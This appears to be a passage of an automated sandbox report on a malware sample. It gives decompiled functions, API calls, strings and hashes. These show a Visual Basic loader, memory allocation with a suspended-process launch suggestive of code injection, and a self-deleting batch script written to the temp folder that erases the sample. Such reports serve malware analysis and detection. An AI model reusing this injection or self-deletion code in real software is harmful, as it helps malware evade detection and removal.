				 *(_t49 - 0x70) =  *(_t49 - 0x70) | _t51;
				_t40 = _t51;
				L9();
				 *_t51 =  *_t51 + 0x44fff; // executed
				_t28 = HeapCreate(1, 0, 0); // executed
				 *(_t49 + 8) = _t28;
				_t39 = _t41;
				_t23 = L0041C326(__ebx, _t39, _t41, _t46, _t55, _t62);
				_push(_t23);
				_t24 = _t23 - 1;
				asm("popad");
				if(_t24 >= 0) {
					asm("insb");
					asm("insb");
					asm("outsd");
					asm("arpl [eax], ax");
					do {
						asm("lodsd");
					} while (_t24 == 0 ||  *_t24 != 0xffffffff83ec8b55 ||  *((intOrPtr*)(_t24 + 4)) != 0xffffffff8d560cec);
					 *_t51 =  *_t51 + 0x44ffe;
					_t25 =  *_t24(_t51, _t39, _t40, 2, _t51, 0, 0, 0); // executed
					return _t25;
				}
				return _t24;
			}

0x0041c2b3
0x0041c2b4
0x0041c2b6
0x0041c2b8
0x0041c2ba
0x0041c2bc
0x0041c2c0
0x0041c2c4
0x0041c2c9
0x0041c2cc
0x0041c2cd
0x0041c2d3
0x0041c2db
0x0041c2dc
0x0041c2e2
0x0041c2ea
0x0041c2eb
0x0041c2f1
0x0041c2f6
0x0041c2f9
0x0041c2fa
0x0041c2fb
0x0041c2fc
0x0041c2fe
0x0041c350
0x0041c351
0x0041c352
0x0041c352
0x0041c357
0x0041c357
0x0041c357
0x0041c359
0x0041c35a
0x0041c35c
0x0041c35c
0x0041c363
0x0041c363
0x0041c300
0x0041c303
0x0041c306
0x0041c309
0x0041c30b
0x0041c316
0x0041c31d
0x0041c31f
0x0041c322
0x0041c365
0x0041c36a
0x0041c36b
0x0041c36c
0x0041c36e
0x0041c370
0x0041c371
0x0041c372
0x0041c373
0x0041c37d
0x0041c37d
0x0041c37e
0x0041c3a2
0x0041c3ac
0x00000000
0x0041c3ae
0x0041c3b1

APIs

HeapCreate.KERNELBASE ref: 0041C31D

Strings

a, xrefs: 0041C2CD
p, xrefs: 0041C2D3
e, xrefs: 0041C2C4
ZBH, xrefs: 0041C365
t, xrefs: 0041C2FA
e, xrefs: 0041C2EB
e, xrefs: 0041C303
r, xrefs: 0041C2E2
a, xrefs: 0041C2F1
C, xrefs: 0041C2DC

Memory Dump Source

Source File: 00000000.00000002.649332210.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.649325933.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.649348743.0000000000421000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.649352878.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.649358085.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.649363001.000000000042B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID: C$ZBH$a$a$e$e$e$p$r$t
API String ID: 10892065-806109700
Opcode ID: 1e4dcb0d92532099e8bfcde6bd255666af820a14ccddb95377bfc1d5073683db
Instruction ID: 58e82dbdb3658900729ccf9ba076fd16bbbb39d88dae26d1e35245091ceddc53
Opcode Fuzzy Hash: 1e4dcb0d92532099e8bfcde6bd255666af820a14ccddb95377bfc1d5073683db
Instruction Fuzzy Hash: AC01926018D7C069F351923C8815B4BAEC91BD2704F28C84EB6D8E22C2D6F98485836F

Uniqueness

Uniqueness Score: -1.00%

Function 0041C267, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 170
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0041C267(void* __ebx, void* __edx, void* __esi) {
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t18;
				intOrPtr* _t19;
				void* _t20;
				void* _t21;
				void* _t60;
				void* _t61;
				void* _t63;
				signed int _t64;
				void* _t65;
				void* _t67;
				void* _t84;
				signed int _t87;
				void* _t94;

				_t63 = __edx;
				_t49 = __ebx;
				_pop(_t60);
				L0041C26A(_t14, __ebx, _t60, __esi, _t94);
				_t16 =  *((intOrPtr*)(__ebx + 0x68))();
				asm("gs insb");
				asm("insb");
				_pop(_t65);
				_t67 = __esi - 1;
				asm("outsd");
				if(_t67 == 0) {
					 *(_t84 - 0x70) =  *(_t84 - 0x70) | _t87;
					_t64 = _t87;
					L14();
					 *_t87 =  *_t87 + 0x44fff; // executed
					_t17 = HeapCreate(1, 0, 0); // executed
					 *(_t84 + 8) = _t17;
					_t61 = _t65;
					_t18 = L0041C326(_t49, _t61, _t65, _t67, __eflags, _t94);
					_push(_t18);
					_t19 = _t18 - 1;
					__eflags = _t19;
					asm("popad");
					if(_t19 >= 0) {
						asm("insb");
						asm("insb");
						asm("outsd");
						asm("arpl [eax], ax");
						__eflags =  &__imp___CIcos;
						goto L15;
						do {
							do {
								do {
									L15:
									asm("lodsd");
									__eflags = _t19;
								} while (_t19 == 0);
								__eflags =  *_t19 - 0xffffffff83ec8b55;
							} while ( *_t19 != 0xffffffff83ec8b55);
							__eflags =  *((intOrPtr*)(_t19 + 4)) - 0xffffffff8d560cec;
						} while ( *((intOrPtr*)(_t19 + 4)) != 0xffffffff8d560cec);
						 *_t87 =  *_t87 + 0x44ffe;
						__eflags =  *_t87;
						_t20 =  *_t19(_t87, _t61, _t64, 2, _t87, 0, 0, 0); // executed
						return _t20;
					}
					return _t19;
				} else {
					asm("o16 jns 0x4c");
					asm("arpl [edi+0x6e], bp");
					 *((intOrPtr*)(_t16 - 1)) =  *((intOrPtr*)(_t16 - 1)) + __ebx;
					_t21 = _t65;
					_push( *((intOrPtr*)(_t84 + 0x52)));
				}
			}

0x0041c267
0x0041c267
0x0041c267
0x0041c28e
0x0041c292
0x0041c295
0x0041c297
0x0041c298
0x0041c299
0x0041c29a
0x0041c29b
0x0041c306
0x0041c309
0x0041c30b
0x0041c316
0x0041c31d
0x0041c31f
0x0041c322
0x0041c365
0x0041c36a
0x0041c36b
0x0041c36b
0x0041c36c
0x0041c36e
0x0041c370
0x0041c371
0x0041c372
0x0041c373
0x0041c377
0x0041c377
0x0041c37d
0x0041c37d
0x0041c37d
0x0041c37d
0x0041c37d
0x0041c37e
0x0041c37e
0x0041c38a
0x0041c38a
0x0041c395
0x0041c395
0x0041c3a2
0x0041c3a2
0x0041c3ac
0x00000000
0x0041c3ae
0x0041c3b1
0x0041c29d
0x0041c29d
0x0041c2a0
0x0041c2a4
0x0041c2a5
0x0041c2a6
0x0041c2a6

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 0041C2AB
HeapCreate.KERNELBASE ref: 0041C31D

Strings

ZBH, xrefs: 0041C365
e, xrefs: 0041C303
KERNEL32, xrefs: 0041C3B7

Memory Dump Source

Source File: 00000000.00000002.649332210.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.649325933.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.649348743.0000000000421000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.649352878.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.649358085.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.649363001.000000000042B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeapIconNotifyShell_
String ID: KERNEL32$ZBH$e
API String ID: 2522922933-1899473809
Opcode ID: 7427d51aef7b1708450cdbeb13e5ddfffb8de5b566c4ce4102e31af8384c4493
Instruction ID: 521c14249353ba93ce19dc54aff6b235836c95a5453462fa8e3fff2d8716eeda
Opcode Fuzzy Hash: 7427d51aef7b1708450cdbeb13e5ddfffb8de5b566c4ce4102e31af8384c4493
Instruction Fuzzy Hash: 34316EB2558A242EF620A1B42C65AEAB74CDB53364F61570BFE90D21C1CA2446C381FE

Uniqueness

Uniqueness Score: -1.00%

Function 04B40A8F, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,?), ref: 04B40AA9
TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04B41A60), ref: 04B40CDB

Strings

mmandLineW, xrefs: 04B41871
ZO, xrefs: 04B41867

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID: Process$CodeExitTerminate
String ID: ZO$mmandLineW
API String ID: 1523012911-2333973816
Opcode ID: ddf7c80e17f3e8fad144c310dacf584b6256b6283887b87ebc2ba230b3b64169
Instruction ID: fc35b1f066d3c9b9d68727d711897ecd79719b5f3215d264125fd81cf527fddf
Opcode Fuzzy Hash: ddf7c80e17f3e8fad144c310dacf584b6256b6283887b87ebc2ba230b3b64169
Instruction Fuzzy Hash: 04210730A00606DBD718EF6CC6547A9B761FFC1324F18869DD96A67781CB34B992EF80

Uniqueness

Uniqueness Score: -1.00%

Function 04B4087C, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 249processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 04B4089C

Strings

mmandLineW, xrefs: 04B41871
ZO, xrefs: 04B41867

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID: CreateProcess
String ID: ZO$mmandLineW
API String ID: 963392458-2333973816
Opcode ID: 3eceb4f3697a1c5f95725fd507d957d81a4dd088abaac63583fb0849004630ba
Instruction ID: c8013028dacdbf9aacab7a98f3dc0787fc5d80be952819cc3cac3f87142682b8
Opcode Fuzzy Hash: 3eceb4f3697a1c5f95725fd507d957d81a4dd088abaac63583fb0849004630ba
Instruction Fuzzy Hash: B4719B31D047856BDB25AFAC8A1C3A97B25FFD3310B1846C5D56257293C620B883B755

Uniqueness

Uniqueness Score: -1.00%

Function 04B40AE4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

csm, xrefs: 04B40BA1
MOC, xrefs: 04B40B9A

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID:
String ID: MOC$csm
API String ID: 0-1389381023
Opcode ID: 459aa3d9913987ae39641fc249ddc2537b967027c4a915005107ac85100968f0
Instruction ID: 74fe522de870a1d6763156c5cd42403e86f75fe636490a5e719e40e3b6e13e53
Opcode Fuzzy Hash: 459aa3d9913987ae39641fc249ddc2537b967027c4a915005107ac85100968f0
Instruction Fuzzy Hash: B4410230344506BBEB296A28C899FE8B671FB4D308F148651F72CC6561C775B8A0AB89

Uniqueness

Uniqueness Score: -1.00%

Function 00401188, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040118D

Strings

VB5!6&*, xrefs: 00401398, 00401188

Memory Dump Source

Source File: 00000000.00000002.649332210.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.649325933.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.649348743.0000000000421000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.649352878.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.649358085.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.649363001.000000000042B000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 4a94630f9d0ed2b473fe86552282cdef1b35c16a5982df7e594d711faab5adad
Instruction ID: 0ecceb6ba8861c98b4905b6d7a9acf2819b5a44605d6637ecb7ff1070faad8e2
Opcode Fuzzy Hash: 4a94630f9d0ed2b473fe86552282cdef1b35c16a5982df7e594d711faab5adad
Instruction Fuzzy Hash: C6B1006244E3C18FD7138B704DA55917FB0AE2321471E84EBC8C1DF4B3E22DA95AC76A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C292, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131memorywindowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 0041C2AB
HeapCreate.KERNELBASE ref: 0041C31D

Strings

KERNEL32, xrefs: 0041C3B7

Memory Dump Source

Source File: 00000000.00000002.649332210.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.649325933.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.649348743.0000000000421000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.649352878.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.649358085.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.649363001.000000000042B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeapIconNotifyShell_
String ID: KERNEL32
API String ID: 2522922933-1217789123
Opcode ID: 1abacec55dd53c80b93eb16ec5708ea5ba95e1cb9cd8f259d6c29ad18bc844ed
Instruction ID: f6c9b3eb452472eef71d767f4126e5e32674215b3af36093e748069e1370d963
Opcode Fuzzy Hash: 1abacec55dd53c80b93eb16ec5708ea5ba95e1cb9cd8f259d6c29ad18bc844ed
Instruction Fuzzy Hash: F2113BA6528D342BF530A0B83C648DBB70CCE932B43522B4BFE50D10C0CA2549D385FD

Uniqueness

Uniqueness Score: -1.00%

Function 04B40387, Relevance: 3.4, APIs: 2, Instructions: 380memoryCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(04B403B7,?,?,00000100), ref: 04B40392
VirtualAllocEx.KERNELBASE(000000FF,00000000,08000000,00003000,00000040), ref: 04B403D9

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID: AllocEnumVirtualWindows
String ID:
API String ID: 1323281959-0
Opcode ID: ff10654bd0f38353a7d4d8b819bc58430c397877d55b13b1621c9b14c0716bae
Instruction ID: 0afd04cd968da5caffbff0d2ba2afcf4e985ed967e6ac04984ae95bb7482314c
Opcode Fuzzy Hash: ff10654bd0f38353a7d4d8b819bc58430c397877d55b13b1621c9b14c0716bae
Instruction Fuzzy Hash: 50F1692DB091918FCBA5DF25A8D8DD0BF309B8D311B4860C9C9A697717E3242517DFB2

Uniqueness

Uniqueness Score: -1.00%

Function 00402FB2, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

#696.MSVBVM60(00403CA4), ref: 00421A4B
__vbaSetSystemError.MSVBVM60(0148CB63,00000000,00403CA4), ref: 00421A66

Memory Dump Source

Source File: 00000000.00000002.649332210.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.649325933.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.649348743.0000000000421000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.649352878.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.649358085.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.649363001.000000000042B000.00000002.00020000.sdmp Download File

Similarity

API ID: #696ErrorSystem__vba
String ID:
API String ID: 1682638366-0
Opcode ID: 2af48c794653242bd0cf104ee0e17f9b06a677a4218dcca10519411258dcfeb8
Instruction ID: cd24f5d89f5410eae393ec7b077bea812e3d8d252e5c27202905309d8a94c185
Opcode Fuzzy Hash: 2af48c794653242bd0cf104ee0e17f9b06a677a4218dcca10519411258dcfeb8
Instruction Fuzzy Hash: 5CD0223520A60129E108BEBB848AB3B29880F54F0DF20403F7200FA4D2CABC8400202F

Uniqueness

Uniqueness Score: -1.00%

Function 04B401E1, Relevance: 1.3, APIs: 1, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000F,00000000,?,00000100), ref: 04B401EE

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b6e7b9debfb694aabae739e8e2bd710d8fe884214757f1165613a49155799f9e
Instruction ID: a483ec1a8e9bd55f9229fcb32dbac7d95ce4a45dc50c50893bf09dea7374cf80
Opcode Fuzzy Hash: b6e7b9debfb694aabae739e8e2bd710d8fe884214757f1165613a49155799f9e
Instruction Fuzzy Hash: 61019E12E40289B7EA342EEC8D4DAFD2711FBE1758F5407C1E626961ED9A207CC3B140

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04B404CA, Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11fe6f05cc95d3fe09d5a558119eb5d728548e82e29a1fc444b28e753b864b00
Instruction ID: 70849398dd23ead83386a7330e5a7177470156ecd21cddec0798c576f7b45378
Opcode Fuzzy Hash: 11fe6f05cc95d3fe09d5a558119eb5d728548e82e29a1fc444b28e753b864b00
Instruction Fuzzy Hash: 83A17971600605EFE758DF28CC84B95B7A4FF88314F188269E96997391CB34B864DFE0

Uniqueness

Uniqueness Score: -1.00%

Function 04B40D59, Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ac87f6b2c640cae0e8823cd09b3e719075b3e6f359d14585e282fea14e444a2
Instruction ID: b0c9eaf09e1e342c88880bbf1f1288f954ebf1d03a82fabb1fa8ffa4fbbabf76
Opcode Fuzzy Hash: 9ac87f6b2c640cae0e8823cd09b3e719075b3e6f359d14585e282fea14e444a2
Instruction Fuzzy Hash: F53126326082C25FD72B8E3C94903E2BB91FFDB310F5885ADC9858B346C674749AE391

Uniqueness

Uniqueness Score: -1.00%

Function 04B41280, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97c26f3e262392ccb4159ac0d84a384af9c8d3a73150d3bd77601d504ceb21b2
Instruction ID: 5803a1dd3457fe2d158428db64e2892def521e6e8a850670a3f3107be79a520c
Opcode Fuzzy Hash: 97c26f3e262392ccb4159ac0d84a384af9c8d3a73150d3bd77601d504ceb21b2
Instruction Fuzzy Hash: 72F049746002448FDB65CF58C894FA03BA5EB4D760F19028CED19DB7E2C624E880CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04B400D8, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aae50d13fa5bccfc47d43a5806915bc297cc530f14902bff1c04ecfbd8ff84ec
Instruction ID: 1790d6d3931a06025fee316c3a2ce1d13120365bc2ea50cb4b909ed14fed9107
Opcode Fuzzy Hash: aae50d13fa5bccfc47d43a5806915bc297cc530f14902bff1c04ecfbd8ff84ec
Instruction Fuzzy Hash: 53D0A734540A50AAE162EA60C8C2F023724D74DA84F1448906A12018824D64B862F4E0

Uniqueness

Uniqueness Score: -1.00%

Function 04B4110B, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 004218A6, Relevance: 15.1, APIs: 10, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E004218A6(void* __ebx, void* __edi, void* __esi, char __fp0, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v36;
				char _v44;
				char _v64;
				void* _t36;
				intOrPtr* _t37;
				void* _t38;
				void* _t43;
				void* _t47;
				void* _t49;
				intOrPtr* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				signed int _t63;
				signed int _t64;
				void* _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t76;

				_t68 = _t67 - 0xc;
				 *[fs:0x0] = _t68;
				_v16 = _t68 - 0x44;
				_v12 = 0x4010a0;
				_t63 = _a4;
				_v8 = _t63 & 0x00000001;
				_t64 = _t63 & 0xfffffffe;
				_a4 = _t64;
				 *((intOrPtr*)( *_t64 + 4))(_t64, __edi, __esi, __ebx,  *[fs:0x0], 0x4010b6, _t65);
				_v44 = 0;
				_push( &_v44);
				_v28 = 0;
				_v64 = 0;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L0040116A();
				_v64 = __fp0;
				L00401164();
				_t70 =  *0x4229d4; // 0x2151b2c
				if(_t70 == 0) {
					_push(0x4229d4);
					_push(0x403c80);
					L0040115E();
				}
				_t58 =  *0x4229d4; // 0x2151b2c
				_t36 =  *((intOrPtr*)( *_t58 + 0x4c))(_t58,  &_v28);
				asm("fclex");
				if(_t36 < 0) {
					_push(0x4c);
					_push(0x403c70);
					_push(_t58);
					_push(_t36);
					L00401158();
				}
				_t37 = _v28;
				_t59 = _t37;
				_t38 =  *((intOrPtr*)( *_t37 + 0x20))(_t37,  &_v64);
				asm("fclex");
				if(_t38 < 0) {
					_push(0x20);
					_push(0x403c90);
					_push(_t59);
					_push(_t38);
					L00401158();
				}
				L00401152();
				if( ~(0 | _v64 != 0x00000000) != 0) {
					_t49 =  *((intOrPtr*)( *_t64 + 0x6fc))(_t64);
					if(_t49 < 0) {
						_push(0x6fc);
						_push(0x403a74);
						_push(_t64);
						_push(_t49);
						L00401158();
					}
				}
				_t76 =  *0x422010; // 0x72fd88
				if(_t76 == 0) {
					_push(0x422010);
					_push(0x402bdc);
					L0040115E();
				}
				_t61 =  *0x422010; // 0x72fd88
				_t43 =  *((intOrPtr*)( *_t61 + 0x2b4))(_t61);
				asm("fclex");
				if(_t43 < 0) {
					_push(0x2b4);
					_push(0x403a40);
					_push(_t61);
					_push(_t43);
					L00401158();
				}
				 *((intOrPtr*)( *_t64 + 0x700))(_t64);
				_t47 =  *((intOrPtr*)( *_t64 + 0x6fc))(_t64);
				if(_t47 < 0) {
					_push(0x6fc);
					_push(0x403a74);
					_push(_t64);
					_push(_t47);
					L00401158();
				}
				_v8 = 0;
				asm("wait");
				_push(E00421A29);
				return _t47;
			}

0x004218a9
0x004218b8
0x004218c5
0x004218c8
0x004218cf
0x004218d7
0x004218da
0x004218de
0x004218e3
0x004218eb
0x004218ee
0x004218ef
0x004218f2
0x004218f5
0x004218fc
0x00421903
0x00421908
0x0042190e
0x00421913
0x00421919
0x0042191b
0x00421920
0x00421925
0x00421925
0x0042192a
0x00421937
0x0042193c
0x0042193e
0x00421940
0x00421942
0x00421947
0x00421948
0x00421949
0x00421949
0x0042194e
0x00421958
0x0042195a
0x0042195f
0x00421961
0x00421963
0x00421965
0x0042196a
0x0042196b
0x0042196c
0x0042196c
0x00421980
0x00421988
0x0042198d
0x00421995
0x00421997
0x0042199c
0x004219a1
0x004219a2
0x004219a3
0x004219a3
0x00421995
0x004219a8
0x004219ae
0x004219b0
0x004219b5
0x004219ba
0x004219ba
0x004219bf
0x004219c8
0x004219d0
0x004219d2
0x004219d4
0x004219d9
0x004219de
0x004219df
0x004219e0
0x004219e0
0x004219e8
0x004219f1
0x004219f9
0x004219fb
0x00421a00
0x00421a05
0x00421a06
0x00421a07
0x00421a07
0x00421a0c
0x00421a0f
0x00421a10
0x00000000

APIs

#593.MSVBVM60(?), ref: 00421903
__vbaFreeVar.MSVBVM60(?), ref: 0042190E
__vbaNew2.MSVBVM60(00403C80,004229D4,?), ref: 00421925
__vbaHresultCheckObj.MSVBVM60(00000000,02151B2C,00403C70,0000004C), ref: 00421949
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,00000020), ref: 0042196C
__vbaFreeObj.MSVBVM60(00000000,?,00403C90,00000020), ref: 00421980
__vbaHresultCheckObj.MSVBVM60(00000000,004010A0,00403A74,000006FC), ref: 004219A3
__vbaNew2.MSVBVM60(00402BDC,00422010), ref: 004219BA
__vbaHresultCheckObj.MSVBVM60(00000000,0072FD88,00403A40,000002B4), ref: 004219E0
__vbaHresultCheckObj.MSVBVM60(00000000,004010A0,00403A74,000006FC), ref: 00421A07

Memory Dump Source

Source File: 00000000.00000002.649348743.0000000000421000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.649325933.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.649332210.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.649352878.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.649358085.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.649363001.000000000042B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$#593
String ID:
API String ID: 734493984-0
Opcode ID: 83c8c74c4005b6d249c17afc8bbb60808a59098d24549a08e06e30d82bd268f6
Instruction ID: c2a4e496c33e5a95fca38fc57b841067e4aaf942ed9135cbc122c6ee08ed05d7
Opcode Fuzzy Hash: 83c8c74c4005b6d249c17afc8bbb60808a59098d24549a08e06e30d82bd268f6
Instruction Fuzzy Hash: 0E419FB0B00219ABCB10AFA5CC89E9E7BB9AF59704F60043BF145B72A1C7785985CB58

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060 Parent PID: 7012 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCOMMON

Executed Functions

Function 004106D5, Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 156
stringfilelibraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004106D5(void* __eax, void* __edx, void* __eflags) {
				CHAR* _v8;
				char* _v12;
				void* _v16;
				char* _v20;
				CHAR* _v24;
				char* _t34;
				char* _t35;
				void* _t39;
				void* _t43;
				void* _t45;
				struct HINSTANCE__* _t49;
				char* _t59;
				void* _t60;

				_v24 = E004017EC(0x105);
				wsprintfA(_v24, "%d.bat", GetTickCount());
				_v8 = E004017EC(0x105);
				_t34 = E004017EC(0x105);
				_v20 = _t34;
				_t35 = E004017EC(0x105);
				_v12 = _t35;
				GetModuleFileNameA( *0x4176b6, _v8, 0x104);
				if(GetTempPathA(0x104, _v20) != 0) {
					lstrcatA(_v20, _v24);
				}
				_t39 = CreateFileA(_v20, 0xc0000000, 3, 0, 2, 0, 0); // executed
				_v16 = _t39;
				if((_t39 + 0x00000001 & _t39 + 0x00000001) != 0) {
					L6:
					_t43 = E004013C2(_v16, "\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t   %1  \t  goto \t\r ktk\r\n del \t  %0 ", lstrlenA("\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t   %1  \t  goto \t\r ktk\r\n del \t  %0 ")); // executed
					CloseHandle(_v16);
					_t45 = _t43;
					if(_t45 != 0) {
						wsprintfA(_v12, "      \"%s\"   ", _v8);
						_t49 = LoadLibraryA("shell32.dll");
						if(_t49 != 0 && GetProcAddress(_t49, "ShellExecuteA") != 0) {
							ShellExecuteA(0, "open", _v20, _v12, 0, 0); // executed
						}
					}
					L11:
					E004017D5(_v24);
					E004017D5(_v8);
					E004017D5(_v20);
					return E004017D5(_v12);
				}
				lstrcpyA(_v20, _v8);
				_t59 = StrRChrIA(_v20, 0, 0x5c);
				if(_t59 != 0) {
					lstrcpyA(_t59 + 1, _v24);
				}
				_t60 = CreateFileA(_v20, 0xc0000000, 3, 0, 2, 0, 0);
				_v16 = _t60;
				if(_t60 + 1 == 0) {
					goto L11;
				} else {
					goto L6;
				}
			}

0x004106f6
0x00410708
0x00410720
0x0041072d
0x00410737
0x00410740
0x0041074e
0x00410768
0x00410785
0x00410792
0x00410792
0x004107ab
0x004107b2
0x004107ba
0x004107fe
0x00410811
0x0041081a
0x0041081f
0x00410822
0x00410831
0x00410843
0x00410845
0x00410867
0x00410867
0x00410845
0x00410869
0x0041086c
0x00410874
0x0041087c
0x0041088a
0x0041088a
0x004107c2
0x004107d3
0x004107d5
0x004107dc
0x004107dc
0x004107f3
0x004107f8
0x004107fc
0x00000000
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

GetTickCount.KERNEL32 ref: 004106FA
wsprintfA.USER32 ref: 00410708
GetModuleFileNameA.KERNEL32(00000000,00000104,00000105,00000105,00000105,?,?,00000105), ref: 00410768
GetTempPathA.KERNEL32(00000104,?,00000000,00000104,00000105,00000105,00000105,?,?,00000105), ref: 0041077E
lstrcatA.KERNEL32(?,?,00000104,?,00000000,00000104,00000105,00000105,00000105,?,?,00000105), ref: 00410792
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104,00000105,00000105,00000105), ref: 004107AB
